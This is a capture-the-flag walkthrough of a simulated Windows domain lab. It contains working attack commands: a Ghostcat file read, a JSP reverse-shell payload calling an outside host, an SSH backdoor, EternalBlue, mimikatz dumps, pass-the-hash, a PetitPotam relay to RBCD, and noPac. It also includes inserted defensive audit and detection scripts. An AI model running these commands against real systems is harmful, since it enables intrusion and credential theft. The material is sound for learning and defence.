flag01
Scan with fscan first.
Open http://39.xx.xx.xx:8080 and take a look at the admin backend site:
dirsearch -u "http://39.xx.xx.xx:8080/"
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/jugg/.dirsearch/reports/39.98.120.30-8080/-_23-10-15_22-30-22.txt
Error Log: /home/jugg/.dirsearch/logs/errors-23-10-15_22-30-22.log
Target: http://39.98.120.30:8080/
[22:30:22] Starting:
[22:30:23] 302 - 0B - /js -> /js/
[22:30:29] 200 - 114B - /404.html
[22:30:36] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[22:30:37] 400 - 795B - /a%5c.aspx
[22:30:56] 302 - 0B - /css -> /css/
[22:30:56] 302 - 0B - /data -> /data/
[22:30:58] 302 - 0B - /docs -> /docs/
[22:30:58] 200 - 17KB - /docs/
[22:30:58] 302 - 0B - /download -> /download/
[22:30:58] 200 - 132B - /download/
[22:31:00] 200 - 946B - /examples/servlets/servlet/RequestHeaderExample
[22:31:00] 200 - 1KB - /examples/
[22:31:00] 200 - 658B - /examples/servlets/servlet/CookieExample
[22:31:00] 302 - 0B - /examples -> /examples/
[22:31:00] 200 - 6KB - /examples/servlets/index.html
[22:31:00] 200 - 679B - /examples/jsp/snp/snoop.jsp
[22:31:02] 403 - 3KB - /host-manager/html
[22:31:02] 403 - 3KB - /host-manager/
[22:31:04] 200 - 7KB - /index.html
[22:31:06] 302 - 0B - /lib -> /lib/
[22:31:09] 302 - 0B - /manager -> /manager/
[22:31:09] 302 - 0B - /images -> /images/
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[22:31:09] 403 - 3KB - /manager/jmxproxy
[22:31:09] 403 - 3KB - /manager/
[22:31:09] 403 - 3KB - /manager/jmxproxy/?qry=STUFF
[22:31:09] 403 - 3KB - /manager/html/
[22:31:09] 403 - 3KB - /manager/admin.asp
[22:31:09] 403 - 3KB - /manager/VERSION
[22:31:09] 403 - 3KB - /manager/login
[22:31:09] 403 - 3KB - /manager/login.asp
[22:31:09] 403 - 3KB - /manager/html
[22:31:09] 403 - 3KB - /manager/status/all
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[22:31:09] 403 - 3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[22:31:09] 403 - 3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[22:31:09] 403 - 3KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[22:31:09] 403 - 3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[22:31:29] 403 - 0B - /upload
[22:31:29] 403 - 0B - /upload/1.php
[22:31:29] 403 - 0B - /upload/loginIxje.php
[22:31:29] 403 - 0B - /upload/b_user.xls
[22:31:29] 403 - 0B - /upload/
[22:31:29] 403 - 0B - /upload/test.txt
[22:31:29] 403 - 0B - /upload/b_user.csv
[22:31:29] 403 - 0B - /upload/2.php
[22:31:29] 403 - 0B - /upload/test.php
[22:31:29] 403 - 0B - /upload/upload.php
[22:31:29] 200 - 9KB - /user.html
Task Completed
Check /docs/.
It turns out to be Apache Tomcat Version 9.0.30, Dec 7 2019, so CVE-2020-1938 (AJP file inclusion) can be used:
python3 ajpShooter.py http://39.xx.xx.xx:8080 8009 /WEB-INF/web.xml read
<!DOCTYPE web-app PUBLIC
  "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
  "http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
  <display-name>Archetype Created Web Application</display-name>
  <security-constraint>
    <display-name>Tomcat Server Configuration Security Constraint</display-name>
    <web-resource-collection>
      <web-resource-name>Protected Area</web-resource-name>
      <url-pattern>/upload/*</url-pattern>
    </web-resource-collection>
    <auth-constraint>
      <role-name>admin</role-name>
    </auth-constraint>
  </security-constraint>
  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <error-page>
    <error-code>403</error-code>
    <location>/error.html</location>
  </error-page>
  <error-page>
    <exception-type>java.lang.Throwable</exception-type>
    <location>/error.html</location>
  </error-page>
  <servlet>
    <servlet-name>HelloServlet</servlet-name>
    <servlet-class>com.example.HelloServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>HelloServlet</servlet-name>
    <url-pattern>/HelloServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>LoginServlet</display-name>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>com.example.LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/LoginServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>RegisterServlet</display-name>
    <servlet-name>RegisterServlet</servlet-name>
    <servlet-class>com.example.RegisterServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>RegisterServlet</servlet-name>
    <url-pattern>/RegisterServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>UploadTestServlet</display-name>
    <servlet-name>UploadTestServlet</servlet-name>
    <servlet-class>com.example.UploadTestServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UploadTestServlet</servlet-name>
    <url-pattern>/UploadServlet</url-pattern>
  </servlet-mapping>
  <servlet>
    <display-name>DownloadFileServlet</display-name>
    <servlet-name>DownloadFileServlet</servlet-name>
    <servlet-class>com.example.DownloadFileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>DownloadFileServlet</servlet-name>
    <url-pattern>/DownloadServlet</url-pattern>
  </servlet-mapping>
</web-app>
There is an UploadServlet that allows file upload, so the file inclusion can be escalated to RCE:
http://39.xx.xx.xx:8080/UploadServlet
Upload a text file test.txt with this content:
<%
// run the command and stream its output back into the response
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
    out.println(new String(b, 0, a)); // only the bytes actually read, not the whole buffer
}
out.print("</pre>");
%>
A popup appears (screenshot).
The returned path:
/upload/10bfc39ad946d9d279328bff761215d4/20231015103624856.txt
Run:
python3 ajpShooter.py http://39.xx.xx.xx:8080/ 8009 /upload/10bfc39ad946d9d279328bff761215d4/20231015103624856.txt eval
Got a shell and obtained flag01.
A way back in needs to be left here.
kali:
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub
Target machine:
echo "<contents of ~/.ssh/id_rsa.pub>" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
kali:
ssh -i ~/.ssh/id_rsa root@39.xx.xx.xx
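A defender-side counterpart to this stage, added here and not part of the writeup or of the tools it uses: an audit of Tomcat's server.xml for the AJP exposure that CVE-2020-1938 depends on (connector enabled, network-bound, no shared secret). The server.xml snippets are constructed; the first mirrors the default a stock Tomcat 9.0.30 shipped with.

```python
"""Audit a Tomcat server.xml for the AJP connector exposure behind CVE-2020-1938
(Ghostcat): an enabled AJP connector that is reachable from the network and
protected by no shared secret. Added example, not from the writeup; the
server.xml snippets are constructed, the first one mirroring the default that
Tomcat 9.0.30 (the version found in this lab) shipped with."""
import xml.etree.ElementTree as ET
from typing import List

# 9.0.31 changed the AJP defaults: bound to loopback, secretRequired=true, and the
# connector commented out in the stock server.xml. Older releases bound 0.0.0.0.
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml, tomcat_version=(9, 0, 30)) -> List[str]:
    """Return one finding per weakness of every enabled AJP connector.

    Connectors inside <!-- --> never reach the parser, which matches Tomcat:
    a commented-out connector is not started."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None:
            if tomcat_version < (9, 0, 31):   # no address: old releases bind all interfaces
                findings.append(f"AJP/{port}: no address set, binds all interfaces on this Tomcat version")
        elif address not in LOOPBACK:
            findings.append(f"AJP/{port}: bound to {address}, reachable from the network")
        # 'secret' (9.0.31+) or 'requiredSecret' (older releases) carries the shared secret
        if not (conn.get("secret") or conn.get("requiredSecret")):
            if tomcat_version >= (9, 0, 31) and conn.get("secretRequired", "true").lower() == "true":
                findings.append(f"AJP/{port}: secretRequired=true without a secret; Tomcat refuses to start this connector")
            else:
                findings.append(f"AJP/{port}: no shared secret, anyone who reaches the port can speak AJP")
    return findings


# Constructed: the AJP block a stock Tomcat 9.0.30 server.xml contained.
DEFAULT_9_0_30 = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed: the same connector hardened (loopback only, shared secret set).
HARDENED = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed: AJP disabled outright, the 9.0.31+ default when no reverse proxy needs it.
COMMENTED_OUT = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
  </Service>
</Server>"""

if __name__ == "__main__":
    for name, xml in (("9.0.30 default", DEFAULT_9_0_30), ("hardened", HARDENED), ("disabled", COMMENTED_OUT)):
        print(f"{name}: {audit_ajp(xml) or ['no findings']}")
```

To run it against a real install, pass the bytes of conf/server.xml (open(path, 'rb').read()) and the version string taken from the /docs/ page or the Tomcat banner.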
flag02
Upload fscan and frp, and set up a proxy:
nohup ./frpc -c frpc.ini &
Information gathering:
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.26:445 open
172.22.11.6:88 open
172.22.11.6:445 open
172.22.11.76:8080 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.26:135 open
172.22.11.76:22 open
172.22.11.6:135 open
172.22.11.45:445 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios: 172.22.11.6 [+]DC XIAORANG\XIAORANG-DC
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
This gives the following topology:
172.22.11.6 XIAORANG-DC (domain controller)
172.22.11.26 XR-LCM3AE8B
172.22.11.76 this host (the entry point)
172.22.11.45 XR-DESKTOP (MS17-010)
First hit 172.22.11.45 with EternalBlue (MS17-010):
msfconsole
setg proxies socks5:152.136.165.68:5001
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
exploit
Got a shell and obtained flag02.
shell
flag03
Information gathering:
meterpreter > load kiwi
meterpreter > hashdump
meterpreter > creds_all
Some credentials were obtained:
Administrator 48f6da83eb89a4da8a1cc963b855a799 – (local credential)
XR-DESKTOP$ 982c2343ba3b998cfe130e9fd919d100 – (domain credential)
yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (plaintext) – (domain credential)
Pass the hash to the administrator's terminal:
proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:48f6da83eb89a4da8a1cc963b855a799 Administrator@172.22.11.45
Use bloodhound.py to collect the zip archive:
proxychains4 python3 bloodhound.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip
Analyse it with BloodHound.
For the detailed reasoning see the expert's writeup: 春秋云镜-【仿真场景】Spoofing writeup - 渗透测试中心 - 博客园 (cnblogs.com)
Sprayed the usernames collected by BloodHound against the password/hash combinations obtained so far; no new users were found.
MAQ = 0, so no computer accounts can be added.
The current LDAP has no TLS, so computers cannot be added remotely either. impacket's addcomputer has two methods, samr and ldaps: samr is limited by MAQ = 0 and cannot add a computer; ldaps is blocked by the missing TLS as well as by MAQ = 0.
The DC is vulnerable to noPac, but the current user yangmei could not get noPac to work, and has no CreateChild ACL on the domain's Computers container.
The DC is vulnerable to noPac, but the current user yangmei has no WriteDacl right on the current Windows machine xr-desktop, meaning its SamAccountName cannot be modified.
DFSCoerce and PetitPotam both exist in the domain, but CVE-2019-1040 does not, so DFSCoerce is dropped and PetitPotam is used first.
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
PetitPotam scan:
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
Attack approach: no ADCS + PetitPotam + NTLM relay.
Attack chain: PetitPotam coerces a vulnerable target that has the WebClient service running into connecting to our HTTP relay; the target uses WebClient to reach the relay with NTLM authentication, which is relayed to LDAP to obtain the machine account's identity; as that machine account, its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute is modified to allow our malicious machine account to impersonate users and authenticate to the target machine (RBCD).
Prerequisite: the target machine must have the WebClient service enabled.
WebClient scan; it confirms that only 172.22.11.26 (XR-LCM3AE8B) can be taken this way:
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav
Relay attack preface:
In a real engagement the relay approach only needs whatever occupies port 80 stopped and a port forward set up (portfwd; Cobalt Strike added rportfwd_local in later versions, which forwards straight to the operator's machine).
This demo follows that real-engagement style rather than simply dropping impacket onto the entry Ubuntu host.
Relay attack environment: port forwarding + proxy.
We need the server's port 80 forwarded to port 80 on the local client.
Note: an SSH reverse port forward only listens on 127.0.0.1, so a small trick is needed here.
As the screenshot shows, even when the reverse forward of port 79 asks to listen on all interfaces (-R *:79:127.0.0.1:80), port 79 still ends up bound to 127.0.0.1, because sshd's GatewayPorts option defaults to no:
ssh -i id_rsa root@39.xx.xx.xx -D vps_ip:5001 -R '*:79:127.0.0.1:80'
So add a socat that forwards 0.0.0.0:80 to 127.0.0.1:79, which the reverse forward carries back to port 80 on the local client; port 80 now effectively listens on 0.0.0.0:
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
Test: traffic arriving at 172.22.11.76:80 goes straight to our local machine:
nc -lvvp 80
proxychains curl http://172.22.11.76:80
Start ntlmrelayx locally.
Note:
As mentioned earlier, there is no LDAPS, so addcomputer cannot be used.
Also, when going through proxychains, ldap:// must be followed by the DC's IP.
Use the previously compromised XR-Desktop as the malicious machine account for the RBCD setup:
proxychains python ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
Use PetitPotam to trigger XR-LCM3AE8B to authenticate to 172.22.11.76 (the Ubuntu host):
proxychains python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26
As can be seen, the RBCD attack is complete; the next step is to request a silver ticket for XR-LCM3AE8B.
Request a CIFS ticket for XR-LCM3AE8B. The hash here is the XR-DESKTOP$ hash captured earlier:
proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :982c2343ba3b998cfe130e9fd919d100 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
A ticket file administrator.ccache is saved locally; bind it:
export KRB5CCNAME=administrator.ccache
Add XR-LCM3AE8B.xiaorang.lab (172.22.11.26) to the hosts file:
sudo vim /etc/hosts
Then use this ticket with psexec for a passwordless connection:
proxychains impacket-psexec xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
Obtain flag03:
type C:\users\administrator\flag\flag03.txt
flag04
Add an administrator account and connect remotely to 172.22.11.26:
net user test Abcd1234 /add
net localgroup administrators test /add
Upload mimikatz and dump credentials (run as administrator):
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit
Accounts obtained:
xiaorang.lab/zhanghui:1232126b24cdf8c9bd2f788a9d7c7ed1
XR-LCM3AE8B$:fa95d924926bcc02e177c18dedc74a7c
Given the challenge description, consider noPac.
Only zhanghui works: zhanghui is in the MA_Admin group, and MA_Admin can create objects under the Computers container:
proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes ':1232126b24cdf8c9bd2f788a9d7c7ed1' -dc-ip 172.22.11.6 --impersonate Administrator -create-child -use-ldap -shell
Obtained flag04.
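As a defender-side counterpart to the RBCD relay chain described in the flag03 stage and the noPac step used here, the following added example (not from the writeup or from any of the tools it uses) runs two detection rules over Event 5136 and 4742 records; the records, the SIDs and the NOPAC-PC$ account name are constructed.

```python
"""Detection rules for the two Active Directory abuses this writeup chains:
 - RBCD: a write to msDS-AllowedToActOnBehalfOfOtherIdentity on a computer
   object (Event 5136, needs 'Audit Directory Service Changes' plus a SACL on
   the object); an NTLM relay to LDAP shows up as the computer account writing
   the attribute on itself.
 - noPac (CVE-2021-42278): a computer's sAMAccountName changed to a value
   without the trailing '$' (Event 4742, 'Changed Attributes' section).
Added example, not part of the original writeup; the events are constructed
records carrying the fields those event IDs log, as a SIEM would hand them
over, and the SIDs and the NOPAC-PC$ account name are made up."""
import re
from dataclasses import dataclass
from typing import List, Optional

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
SID_RE = re.compile(r"S-1-5-21(?:-\d+)+")


@dataclass
class Finding:
    rule: str
    severity: str
    subject: str
    target: str
    detail: str


def check_rbcd_write(ev: dict) -> Optional[Finding]:
    """Event 5136: any write to the RBCD attribute is worth a look; a self-write is the relay signature."""
    if ev["event_id"] != 5136 or ev["ldap_display_name"].lower() != RBCD_ATTR.lower():
        return None
    # "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab" -> "XR-LCM3AE8B"
    target_cn = ev["object_dn"].split(",")[0].split("=", 1)[1]
    subject = ev["subject_account"]
    self_write = subject.rstrip("$").lower() == target_cn.lower()
    # 5136 renders security-descriptor values as SDDL; pull out the SIDs granted access.
    allowed = SID_RE.findall(ev.get("value", ""))
    note = ("computer account modified its own RBCD ACL (NTLM relay to LDAP pattern)"
            if self_write else "RBCD ACL changed; confirm it was an intended delegation setup")
    return Finding(rule="rbcd-attribute-write", severity="high" if self_write else "medium",
                   subject=subject, target=target_cn + "$",
                   detail=f"{note}; principals granted: {allowed or 'none parsed'}")


def check_nopac_rename(ev: dict) -> Optional[Finding]:
    """Event 4742: a computer account's sAMAccountName must keep its trailing '$'."""
    if ev["event_id"] != 4742:
        return None
    new_sam = ev.get("changed_sam_account_name", "-")   # "-" means the attribute did not change
    if new_sam in ("-", "") or new_sam.endswith("$"):
        return None
    return Finding(rule="computer-samaccountname-without-dollar", severity="high",
                   subject=ev["subject_account"], target=ev["target_account"],
                   detail=f"sAMAccountName changed to {new_sam!r}; this is the noPac rename step")


def run_detections(events: List[dict]) -> List[Finding]:
    findings = []
    for ev in events:
        for rule in (check_rbcd_write, check_nopac_rename):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample events; key names mirror the fields in the 5136/4742 event text.
SAMPLE_EVENTS = [
    {   # relayed machine account writing its own RBCD attribute
        "event_id": 5136, "subject_account": "XR-LCM3AE8B$",
        "object_dn": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
        "ldap_display_name": RBCD_ATTR, "operation": "Value Added",
        "value": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3598443049-773813974-2432140268-1105)",
    },
    {   # benign SPN update on the same object: not flagged
        "event_id": 5136, "subject_account": "XR-LCM3AE8B$",
        "object_dn": "CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab",
        "ldap_display_name": "servicePrincipalName", "operation": "Value Added",
        "value": "HOST/XR-LCM3AE8B.xiaorang.lab",
    },
    {   # noPac: a fresh computer account renamed to the DC's name minus '$'
        "event_id": 4742, "subject_account": "zhanghui",
        "target_account": "NOPAC-PC$", "changed_sam_account_name": "XIAORANG-DC",
    },
    {   # benign 4742 (password change) leaves sAMAccountName at "-": not flagged
        "event_id": 4742, "subject_account": "XR-DESKTOP$",
        "target_account": "XR-DESKTOP$", "changed_sam_account_name": "-",
    },
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.subject} -> {f.target}: {f.detail}")
```

Both rules need auditing that is not on by default: 5136 requires the Directory Service Changes subcategory and a SACL on the computer objects, while 4742 only needs Computer Account Management auditing on the DCs.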